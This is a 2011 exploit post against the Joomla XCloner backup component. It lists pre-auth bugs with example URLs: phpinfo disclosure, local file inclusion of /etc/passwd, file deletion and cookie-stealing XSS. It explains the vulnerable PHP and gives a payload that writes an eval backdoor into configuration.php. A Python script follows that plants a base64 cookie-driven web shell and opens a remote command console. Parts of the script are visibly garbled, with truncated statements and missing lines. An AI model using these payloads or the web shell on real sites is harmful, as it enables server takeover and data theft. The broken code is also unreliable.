Joomla! Component com_xcloner-backupandrestore – Remote Command Execution

  • 作者: mr_me
    日期: 2011-02-25
  • 类别:
  • 来源:
  • #!/usr/bin/python
    # Joomla component (com_xcloner-backupandrestore) remote code execution exploit 
    # Vendor:
    # "Our true divinity is in our ability to create. And armed with the understanding of the symbiotic connections
    # of life, while being guided by the emergent nature of reality, there is nothing we cannot do or accomplish." 
    # - Zeitgeist addendum
    # Target Environment Settings:
    # ============================
    # register_globals = On/Off (doesnt matter)
    # Description:
    # ============
    # XCloner is a Website Backup and Restore application designed for PHP/Mysql websites, it can work as a native plugin for WordPress and Joomla!. 
    # XCloner design was specifically created to Generate custom backups of any LAMP website through custom admin inputs, and to be able to Restore 
    # the clone on any other location with the help of the automatic Restore script we provide, independent from the main package!
    # XCloner Backup tool uses Open Source standards like TAR and Mysql formats so you can rest assured your backups can be restored in a variety 
    # of ways, giving you more flexibility and full control.
    # Vulnerability List (wordpress/joomla) & Explanation:
    # ====================================================
    # Here is the list of pre - auth vulns o.O:
    # Information Disclosure with phpinfo()
    # http://[target]/[path]/wp-content/plugins/xcloner-backup-and-restore/restore/XCloner.php?task=info
    # http://[target]/[path]/administrator/components/com_xcloner-backupandrestore/restore/XCloner.php?task=info
    # Local File Inclusion:
    # http://[target]/[path]/wp-content/plugins/xcloner-backup-and-restore/cloner.cron.php?config=../../../../../../../../etc/passwd
    # http://[target]/[path]/administrator/components/com_xcloner-backupandrestore/cloner.cron.php?config=../../../../../../../../etc/passwd
    # DoS/damage by calling unlink() on wordpress/joomla files:
    # http://[target]/[wp path]/wp-content/plugins/xcloner-backup-and-restore/restore/XCloner.php?task=step2&output_path=[path]/[file]
    # http://[target]/[path]/administrator/components/com_xcloner-backupandrestore/restore/XCloner.php?task=step2&output_path=[path]/[file]
    # XSS:
    # http://[target]/[path]/wp-content/plugins/xcloner-backup-and-restore/index2.php?option=com_cloner&mosmsg=<script>alert(document.cookie)</script>
    # http://[target]/[path]/wp-content/plugins/xcloner-backup-and-restore/index2.php?username=adsc&password=dac&option=com_cloner
    # ";alert(document.cookie)//&task=dologin&boxchecked=0&hidemainmenu=0
    # http://[target]/[path]/administrator/components/com_xcloner-backupandrestore/index2.php?option=com_cloner&mosmsg=
    # <script>alert(document.cookie)</script>
    # Not to mention the post - auth bugs...... but the most potent, pre-auth rce (joomla only). Enough yip yap, here we go....
    # By accessing the XCloner.php page, the webmaster is presented an important message: "Security Note: After restore delete the 
    # XCloner.php script from your server". So my understanding is that the vulnerable code in this file, is sitting on web servers 
    # without requiring authentication to access until a restore happens. o.O. Below is an explanation of the vulnerable code, sorry but 
    # this is going to be long:
    # The XCloner.php script begins by setting the array element 'output_path' of $_CONFIG to our input on line 72:
    # $_CONFIG['output_path'] = $_REQUEST['output_path'];
    # Later on we see a simple switch on lines 134-150 on our task parameter
    # switch ($_REQUEST[task]) {
    #case 'step2':
    # step2();
    # break;
    # We follow the case "step2" switch and land into that function (step2()) defined on lines 178-?. Inside that function we set the 
    # $_CONFIG array to global. The attacker must make sure that they DO NOT set the 'DBcreated' or 'transfer_mode' variable to 'on' or '2' 
    # (respectively) as it will kill our script when if it fails to connect to the database or FTP server. This is important to note, 
    # you will see later on.
    # function step2($file=""){
    # global $_CONFIG,$filepath ;
    # $DBcreated= $_REQUEST[DBcreated];
    # if ($DBcreated=='on'){
    #	-- snip --
    # $db = @mysql_connect($DBhostname, $DBuserName, $DBpassword) or die("<br />The database details provided are incor... blah blah
    #	-- snip --
    # if($_REQUEST[transfer_mode]==2){
    #	-- snip --
    #// set up basic connection
    #$conn_id = @ftp_connect($_REQUEST[ftp_server], $_REQUEST[ftp_port]) or die("<span class='error'>Could not connect to .. blah blah
    # We keep looking and we see something interesting on lines 473 - 483
    # if(($_REQUEST['do_database'] != 1) || ($_REQUEST['files_skip'] == 1)){
    # $config_file = $_CONFIG[output_path]."/configuration.php";
    # @chmod($config_file,0777);
    # @unlink($_CONFIG[output_path]."/administrator/backups/perm.txt");
    # if(($_CONFIG['sql_usefile'] == "database-sql.sql") and ($update_config))
    # if(write_config($config_file)){
    # echo "<H2>Configuration updated!</H2>";
    # }else{
    # echo "<span class='error'>Unable to write to configuration file $config_file... Aborting...</span>";return;
    # }
    # }
    # So an attacker must ensure that our request does not contain any 'do_database' variable or have the 'files_skip' variable containing a 
    # value of '1'. If the attacker calls the configuration.php with a null byte (../../../../configuration.php%00) then the unlink() will be 
    # triggered and delete the config file we are trying to backdoor! So the attacker can specify the 'output_path' variable to 
    # '../../../../' instead and simply let the application append the 'configuration.php'. Now lets break down the call to write_config() 
    # which is defined at line 547 
    # function write_config($file){
    # echo "made it here";
    # if(@$fp = fopen($file, "r")){
    # $config_data = "";
    # while(!feof($fp))
    # $config_data .= fread($fp, 1024);
    # fclose($fp);
    # }
    # Ok so the script reads the file into $config_data variable.
    # if ($_REQUEST[DBcreated] == 'on'){
    # $config_data = str_replace("define('DB_HOST', '", "define('DB_HOST', '".$_REQUEST[mysql_server]."');#", $config_data);
    # $config_data = str_replace("define('DB_USER', '", "define('DB_USER', '".$_REQUEST[mysql_username]."');#
    # -- snip --
    # if($_REQUEST['transfer_mode'] == 2){
    # $config_data = str_replace('$'.'ftp_host =',"$"."ftp_host ='".$_REQUEST[ftp_server]."';#", $config_data);
    # $config_data = str_replace('$'.'ftp_port =',"$"."ftp_port ='".$_REQUEST[ftp_port]."';#", $config_
    # -- snip --
    # Now if the 'DBcreated' variable is set to 'on' or the 'transfer_mode' variable is set to '2', the attacker can overwrite the configuration.php 
    # file with 'mysql_server', 'mysql_username' or 'ftp_server', 'ftp_port' variables etc. However, the beginning of the XCloner.php script will 
    # kill the execution simply because setting those values will force the code to make an authentication, fail (if credz are wrong) and then die.
    # if we keep looking, from line 585 we see:
    # $config_data = str_replace('$'.'live_site =',"$"."live_site ='".$_REQUEST[output_url_pref]."://".$_REQUEST[output_url]."';#", $config_data);
    # if ($fp = fopen($file, "w")) {
    # fwrite( $fp, $config_data);
    # fclose( $fp );
    # } else {
    # return false;
    # } // if
    #return true;
    # }
    # This is not part of the if statements like before, so the attacker at this point can simply overwrite the '$live_site' variable contained 
    # within configuration.php with 'malicious' code by setting the 'output_url_pref' variable accordingly.
    # Exploitation:
    # =============
    # Seems to be that joomla and wordpress both have the vulnerable code in their plugins however only joomla uses the $live_site
    # variable in their configuration file.
    # Simply set the backdoor in configuration.php against our target:
    # http://[target]/[path]administrator/components/com_xcloner-backupandrestore/restore/XCloner.php?
    # task=step2&output_url_pref=';+}+?>+<?php+eval($_GET['lol']);+?>&output_path=../../../../
    # Execute our code:
    # http://[target]/[path]/?lol=phpinfo();
    # http://[target]/[path]/?lol=system("id");
    # [mr_me@pluto xcloner]$ python -p localhost:8080 -t -d /webapps/joomla/
    # 	| ----------------------------------------------------------------------------- |
    # 	| Joomla component (com_xcloner-backupandrestore) remote code execution explo!t |
    # 	| by mr_me - ---------------------------------------------------- |
    # (+) Testing proxy @ localhost:8080.. proxy is found to be working!
    # (+) Targeting
    # (!) Exploit working!
    # (+) Droping to remote console (q for quit)
    # mr_me@ id
    # uid=33(www-data) gid=33(www-data) groups=33(www-data)
    # mr_me@ q
    import sys
    import urllib
    import re
    import urllib2
    import getpass
    import base64
    from optparse import OptionParser
    usage = "./%prog [<options>] -t [target] -d [directory]"
    usage += "\nExample: ./%prog -p localhost:8080 -t -d /joomla/"
    parser = OptionParser(usage=usage)
    parser.add_option("-p", type="string",action="store", dest="proxy",
    help="HTTP Proxy <server:port>")
    parser.add_option("-t", type="string", action="store", dest="target",
    help="The Target server <server:port>")
    parser.add_option("-d", type="string", action="store", dest="dirPath",
    help="Directory path to the CMS")
    (options, args) = parser.parse_args()
    def banner():
    	print "\n\t| ----------------------------------------------------------------------------- |"
    	print "\t| Joomla component (com_xcloner-backupandrestore) remote code execution explo!t |"
    	print "\t| by mr_me - ---------------------------------------------------- |\n"
    if len(sys.argv) < 5:
    def testProxy():
    	check = 1
    	sys.stdout.write("(+) Testing proxy @ %s.. " % (options.proxy))
    	req = urllib2.Request("")
    		check = urllib2.urlopen(req)
    	check = 0
    	if check != 0:
    	sys.stdout.write("proxy is found to be working!\n")
    	print "proxy failed, exiting.."
    def interactiveAttack():
    print "(+) Droping to remote console (q for quit)\n"
    hn = "%s@%s# " % (getpass.getuser(),
    preBaseCmd = ""
    while preBaseCmd != 'q':
    preBaseCmd = raw_input(hn)
    		preBaseCmdSetup = ("system(\"%s\");" % (preBaseCmd))
    cmdInBase64 = base64.b64encode(preBaseCmdSetup)
    		cookieCmd = ("lol=%s;" % (cmdInBase64))
    resp = getServerResponse( + options.dirPath, cookieCmd, None)
    		result = resp.split("://")[0]
    		print result
    def getServerResponse(exploit, header=None, data=None):
    		headers = {}
    		if header != None:
    			headers['Cookie'] = header
    		if data != None:
    			data = urllib.urlencode(data)
    		req = urllib2.Request("http://"+exploit, data, headers)
    		if options.proxy:
    		check = urllib2.urlopen(req).read()			
    		check =
    	return check
    def backdoorTarget():
    	print "(+) Targeting http://%s%s" % (, options.dirPath)
    	phpShell = "'; } ?> <?php eval(base64_decode($_COOKIE['lol'])); ?>"
    	backdoorReq = ("administrator/components/com_xcloner-backupandrestore/restore/XCloner.php")
    	data = {'task':'step2', 'output_url_pref':phpShell, 'output_path':'../../../../'}
    	req = + options.dirPath + backdoorReq
    	check = getServerResponse(req, None, data)
    	if"All should be done! Click here to continue...", check):
    		print "(!) Exploit working!"
    		print "(-) Exploit failed, exiting.."
    def main():
    	if options.proxy:
    if __name__ == "__main__":